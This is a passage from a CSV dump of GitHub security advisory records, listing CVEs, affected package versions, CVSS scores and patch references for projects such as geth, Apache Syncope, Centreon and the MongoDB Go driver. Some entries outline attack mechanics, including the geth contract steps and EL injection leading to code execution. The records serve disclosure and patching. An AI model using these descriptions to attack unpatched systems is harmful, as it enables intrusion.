'https://nvd.nist.gov/vuln/detail/CVE-2021-27673'}, {'type': 'WEB', 'url': 'https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38'}, {'type': 'PACKAGE', 'url': 'https://github.com/TribalSystems/Zenario'}, {'type': 'WEB', 'url': 'https://github.com/TribalSystems/Zenario/releases/tag/8.8.53370'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/163083/Zenario-CMS-8.8.52729-SQL-Injection.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T21:43:48Z', 'nvd_published_at': '2021-04-15T14:15:00Z'}" +1.4.0,GHSA-f6mq-5m25-4r72,2023-08-30T00:18:26Z,2021-06-15T16:08:16Z,,['CVE-2021-20329'],go.mongodb.org/mongo-driver improperly validates cstrings when marshalling Go objects into BSON,Specific cstrings input may not be properly validated in the MongoDB Go Driver when marshalling Go objects into BSON. A malicious user could use a Go object with specific string to potentially inject additional fields into marshalled documents. This issue affects all MongoDB GO Drivers up to (and including) 1.5.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'go.mongodb.org/mongo-driver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20329'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-go-driver/pull/622'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-go-driver/commit/2aca31d5986a9e1c65a92264736de9fdc3b9b4ca'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-go-driver/releases/tag/v1.5.1'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/GODRIVER-1923'}]","{'cwe_ids': ['CWE-1287', 'CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:11:50Z', 'nvd_published_at': '2021-06-10T17:15:00Z'}" +1.4.0,GHSA-55xh-53m6-936r,2021-06-01T19:14:06Z,2021-06-01T21:17:36Z,,[],Improper Verification of Cryptographic Signature in aws-encryption-sdk-java,"### Impact + +This advisory addresses several LOW severity issues with streaming signed messages and restricting processing of certain types of invalid messages. + +This update addresses an issue where certain invalid ECDSA signatures incorrectly passed validation. These signatures provide defense in depth and there is no impact on the integrity of decrypted plaintext. + +This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the ECDSA signature, an actor with trusted KMS permissions to decrypt a message may also be able to encrypt messages. This update introduces a new API for callers who wish to stream only unsigned messages. + +For customers who process ESDK messages from untrusted sources, this update also introduces a new configuration to limit the number of Encrypted Data Keys (EDKs) that the ESDK will attempt to process per message. This configuration provides customers with a way to limit the number of AWS KMS Decrypt API calls that the ESDK will make per message. This setting will reject messages with more EDKs than the configured limit. + +Finally, this update adds early rejection of invalid messages with certain invalid combinations of algorithm suite and header data. + +### Patches + +Fixed in versions 1.9 and 2.2. We recommend that all users upgrade to address these issues. + +Customers leveraging the ESDK’s streaming features have several options to protect signature validation. One is to ensure that client code reads to the end of the stream before using released plaintext. With this release, using the new API for streaming and falling back to the non-streaming decrypt API for signed messages prevents using any plaintext from signed data before the signature is validated. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x + +Users processing ESDK messages from untrusted sources should use the new maximum encrypted data keys parameter. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x + +### Workarounds + +None + +### For more information + +https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#digital-sigs + +https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x + +",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.amazonaws:aws-encryption-sdk-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.amazonaws:aws-encryption-sdk-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T19:14:06Z', 'nvd_published_at': None}" +1.4.0,GHSA-h72c-w3q3-55qq,2023-03-03T23:20:29Z,2021-06-02T21:45:12Z,,['CVE-2020-13388'],OS Command Injection in jw.util,"An exploitable vulnerability exists in the configuration-loading functionality of the jw.util package before 2.3 for Python. When loading a configuration with FromString or FromStream with YAML, one can execute arbitrary Python code, resulting in OS command execution, because safe_load is not used.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jw.util'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13388'}, {'type': 'WEB', 'url': 'https://joel-malwarebenchmark.github.io'}, {'type': 'WEB', 'url': 'https://joel-malwarebenchmark.github.io/blog/2020/04/27/cve-2020-13388-jw-util-vulnerability/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200528-0002/'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-14T20:59:12Z', 'nvd_published_at': '2020-05-22T17:15:00Z'}" +1.4.0,GHSA-35g4-qx3c-vjhx,2021-06-16T20:08:37Z,2021-06-21T17:09:22Z,,['CVE-2021-32659'],Automatic room upgrade handling can be used maliciously to bridge a room non-consentually ,"### Impact + +If a bridge has room upgrade handling turned on in the configuration (the `roomUpgradeOpts` key when instantiating a new `Bridge` instance.), any `m.room.tombstone` event it encounters will be used to unbridge the current room and bridge into the target room. However, the target room `m.room.create` event is not checked to verify if the `predecessor` field contains the previous room. This means that any mailcious admin of a bridged room can repoint the traffic to a different room without the new room being aware. + + +### Patches + +Versions 2.6.1 and greater are patched. + +### Workarounds + +Disabling the automatic room upgrade handling can be done by removing the `roomUpgradeOpts` key from the `Bridge` class options. + +### References + +The issue is patched by https://github.com/matrix-org/matrix-appservice-bridge/pull/330 + +### For more information] + +If you have any questions or comments about this advisory, email us at security@matrix.org.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'matrix-appservice-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge/security/advisories/GHSA-35g4-qx3c-vjhx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32659'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge/pull/330'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge/commit/b69e745584a34fcfd858df33e4631e420da07b9f'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge/releases/tag/2.6.1'}]","{'cwe_ids': ['CWE-306'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T20:08:37Z', 'nvd_published_at': '2021-06-16T19:15:00Z'}" +1.4.0,GHSA-x5h4-9gqw-942j,2021-06-01T19:12:22Z,2021-06-01T21:17:53Z,,[],Improper Verification of Cryptographic Signature in aws-encryption-sdk,"### Impact + +This advisory addresses several LOW severity issues with streaming signed messages and restricting processing of certain types of invalid messages. + +This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the ECDSA signature, an actor with trusted KMS permissions to decrypt a message may also be able to encrypt messages. This update introduces a new API for callers who wish to stream only unsigned messages. + +For customers who process ESDK messages from untrusted sources, this update also introduces a new configuration to limit the number of Encrypted Data Keys (EDKs) that the ESDK will attempt to process per message. This configuration provides customers with a way to limit the number of AWS KMS Decrypt API calls that the ESDK will make per message. This setting will reject messages with more EDKs than the configured limit. + +Finally, this update adds early rejection of invalid messages with certain invalid combinations of algorithm suite and header data. + +### Patches + +Fixed in versions 1.9 and 2.2. We recommend that all users upgrade to address these issues. + +Customers leveraging the ESDK’s streaming features have several options to protect signature validation. One is to ensure that client code reads to the end of the stream before using released plaintext. With this release, using the new API for streaming and falling back to the non-streaming decrypt API for signed messages prevents using any plaintext from signed data before the signature is validated. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x + +Users processing ESDK messages from untrusted sources should use the new maximum encrypted data keys parameter. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x + +### Workarounds + +None + +### For more information + +https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#digital-sigs + +https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x +",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aws/aws-encryption-sdk-python/security/advisories/GHSA-x5h4-9gqw-942j'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T19:12:22Z', 'nvd_published_at': None}" +1.4.0,GHSA-mvrg-5c4w-7qv4,2021-05-03T17:59:02Z,2021-06-22T15:25:22Z,,['CVE-2018-10704'],Cross-site Scripting in yii2cmf,yidashi yii2cmf 2.0 has XSS via the /search q parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'yidashi/yii2cmf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-10704'}, {'type': 'WEB', 'url': 'https://github.com/yidashi/yii2cmf'}, {'type': 'WEB', 'url': 'http://testh5shanglv.minshengec.com:1024/phpmyadmin/doc/yii2cmf_xss.htm'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T17:59:02Z', 'nvd_published_at': '2020-03-12T21:15:00Z'}" +1.4.0,GHSA-r33q-22hv-j29q,2023-02-09T19:39:22Z,2021-06-29T21:14:07Z,,['CVE-2020-26264'],Denial of service in github.com/ethereum/go-ethereum,"### Impact + +A DoS vulnerability can make a LES server crash via malicious `GetProofsV2` request from a connected LES client. + +### Patches + +The vulnerability was patched in https://github.com/ethereum/go-ethereum/pull/21896. + +### Workarounds + +This vulnerability only concerns users explicitly enabling `les` server; disabling `les` prevents the exploit. +It can also be patched by manually applying the patch in https://github.com/ethereum/go-ethereum/pull/21896. + + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) +* Email us at [security@ethereum.org](mailto:security@ethereum.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.25'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-r33q-22hv-j29q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26264'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/21896'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/bddd103a9f0af27ef533f04e06ea429cf76b6d46'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/go-ethereum'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/releases/tag/v1.9.25'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0063'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:45:23Z', 'nvd_published_at': None}" +1.4.0,GHSA-r5mf-q76q-f2xq,2021-05-28T22:24:47Z,2021-06-08T20:13:05Z,,['CVE-2021-27676'],Cross-site scripting in Centreon,Centreon version 20.10.2 is affected by a cross-site scripting (XSS) vulnerability. The dep_description (Dependency Description) and dep_name (Dependency Name) parameters are vulnerable to stored XSS. A user has to log in and go to the Configuration > Notifications > Hosts page.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.10.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27676'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/pull/9587'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/releases/tag/20.10.7'}, {'type': 'WEB', 'url': 'http://centreon.com'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T22:24:47Z', 'nvd_published_at': '2021-05-26T11:15:00Z'}" +1.4.0,GHSA-69v6-xc2j-r2jf,2021-05-21T21:51:49Z,2021-06-29T21:13:01Z,,['CVE-2020-26241'],Shallow copy bug in geth,"### Impact +This is a Consensus vulnerability, which can be used to cause a chain-split where vulnerable nodes reject the canonical chain. + +Geth’s pre-compiled `dataCopy` (at `0x00...04`) contract did a shallow copy on invocation. An attacker could deploy a contract that + +- writes `X` to an EVM memory region `R`, +- calls `0x00..04` with `R` as an argument, +- overwrites `R` to `Y`, +- and finally invokes the `RETURNDATACOPY` opcode. + +When this contract is invoked, a consensus-compliant node would push `X` on the EVM stack, whereas Geth would push `Y`. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) +* Email us at [security@ethereum.org](mailto:security@ethereum.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.7'}, {'fixed': '1.9.17'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum/core/vm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.19.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-69v6-xc2j-r2jf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26241'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/295693759e5ded05fec0b2fb39359965b60da785'}, {'type': 'WEB', 'url': 'https://blog.ethereum.org/2020/11/12/geth_security_release/'}]","{'cwe_ids': ['CWE-682'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:51:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-37m5-42qp-4qpr,2021-05-19T20:00:18Z,2021-06-18T18:38:09Z,,['CVE-2021-32091'],Cross-site scripting in LocalStack,A Cross-site scripting (XSS) vulnerability exists in StackLift LocalStack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'localstack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.12.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32091'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/hack-the-stack-with-localstack'}, {'type': 'WEB', 'url': 'https://portswigger.net/daily-swig/localstack-zero-day-vulnerabilities-chained-to-achieve-remote-takeover-of-local-instances'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T20:00:18Z', 'nvd_published_at': '2021-05-07T05:15:00Z'}" +1.4.0,GHSA-wv5p-gmmv-wh9v,2021-06-04T18:53:53Z,2021-06-01T21:53:29Z,,['CVE-2021-20178'],Insertion of Sensitive Information into Log File in ansible,A flaw was found in ansible module where credentials are disclosed in the console log by default and not protected by the security feature when using the bitbucket_pipeline_variable module. This flaw allows an attacker to steal bitbucket_pipeline credentials. The highest threat from this vulnerability is to confidentiality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20178'}, {'type': 'WEB', 'url': 'https://github.com/ansible-collections/community.general/pull/1635,'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1914774'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/blob/v2.9.18/changelogs/CHANGELOG-v2.9.rst#security-fixes'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FUQ2QKAQA5OW2TY3ACZZMFIAJ2EQTG37/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HIU7QZUV73U6ZQ65VJWSFBTCALVXLH55/'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:21:27Z', 'nvd_published_at': '2021-05-26T12:15:00Z'}" +1.4.0,GHSA-fg3j-q579-v8x4,2022-02-08T21:22:40Z,2021-06-15T15:54:32Z,,['CVE-2021-31811'],Uncontrolled memory consumption,"In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.pdfbox:pdfbox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.pdfbox:pdfbox-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31811'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e%40%3Cusers.pdfbox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e@%3Cusers.pdfbox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf937c2236e6c79cdb99f76a70690dd345e53dbe0707cb506a202e43e@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/06/12/2'}]","{'cwe_ids': ['CWE-770', 'CWE-789'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:39:19Z', 'nvd_published_at': '2021-06-12T10:15:00Z'}" +1.4.0,GHSA-399h-cmvp-qgx5,2021-05-25T20:16:35Z,2021-06-29T21:32:11Z,,['CVE-2020-12118'],Incorrect Default Permissions in Binance tss-lib,The keygen protocol implementation in Binance tss-lib before 1.2.0 allows attackers to generate crafted h1 and h2 parameters in order to compromise a signing round or obtain sensitive information from other parties.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N/E:U/RL:O/RC:R'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/binance-chain/tss-lib/ecdsa/keygen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12118'}, {'type': 'WEB', 'url': 'https://github.com/binance-chain/tss-lib/pull/89'}, {'type': 'WEB', 'url': 'https://github.com/binance-chain/tss-lib/pull/89/commits/7b7c17e90504d5dad94b938e84fec690bb1ec311'}, {'type': 'WEB', 'url': 'https://github.com/binance-chain/tss-lib/releases/tag/v1.2.0'}]","{'cwe_ids': ['CWE-276'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:16:35Z', 'nvd_published_at': None}" +1.4.0,GHSA-vjqw-r3ww-wj2w,2021-07-29T16:57:05Z,2021-06-16T17:18:58Z,,['CVE-2020-1959'],Expression Language Injection in Apache Syncope,"A Server-Side Template Injection was identified in Apache Syncope prior to 2.1.6 enabling attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template being passed, they will be able to run arbitrary Java code.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.syncope:syncope-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1959'}, {'type': 'WEB', 'url': 'http://syncope.apache.org/security'}]","{'cwe_ids': ['CWE-917'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:59:03Z', 'nvd_published_at': '2020-05-04T13:15:00Z'}" +1.4.0,GHSA-v528-7hrm-frqp,2023-02-15T18:39:26Z,2021-06-16T18:03:47Z,,['CVE-2021-27568'],Improper Check for Unusual or Exceptional Conditions in json-smart,"An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. When it is not caught, it may cause programs using the library to crash or expose sensitive information.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.minidev:json-smart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'net.minidev:json-smart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'net.minidev:json-smart-mini'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'net.minidev:json-smart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27568'}, {'type': 'WEB', 'url': 'https://github.com/netplex/json-smart-v1/issues/7'}, {'type': 'WEB', 'url': 'https://github.com/netplex/json-smart-v2/issues/60'}, {'type': 'WEB', 'url': 'https://github.com/netplex/json-smart-v2/issues/62'}, {'type': 'WEB', 'url': 'https://github.com/netplex/json-smart-v2/pull/72'}, {'type': 'WEB', 'url': 'https://github.com/netplex/json-smart-v1/commit/768db58ee0e3e344fcdb574b7629765308a1d0af'}, {'type': 'PACKAGE', 'url': 'https://github.com/netplex/json-smart-v2'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6287f5aa628c8d9af52b5401ec6cc51b6fc28ab20d318943453e396@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re237267da268c690df5e1c6ea6a38a7fc11617725e8049490f58a6fa@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf70210b4d63191c0bfb2a0d5745e104484e71703bf5ad9cb01c980c6@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:30:13Z', 'nvd_published_at': '2021-02-23T02:15:00Z'}" +1.4.0,GHSA-jwhm-9cjm-4493,2023-05-24T14:40:36Z,2021-06-16T17:24:41Z,,['CVE-2021-21649'],Cross-site Scripting in Jenkins Dashboard View Plugin,"Jenkins Dashboard View Plugin prior to 2.16 and 2.12.1 does not escape URLs referenced in Image Dashboard Portlets, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with View/Configure permission. + +As part of this fix, the property for image URLs was changed from `url` to `imageUrl`. Existing [Configuration as Code](https://plugins.jenkins.io/configuration-as-code/) configurations are still supported, but exports will emit the new property.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:dashboard-view'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.13'}, {'fixed': 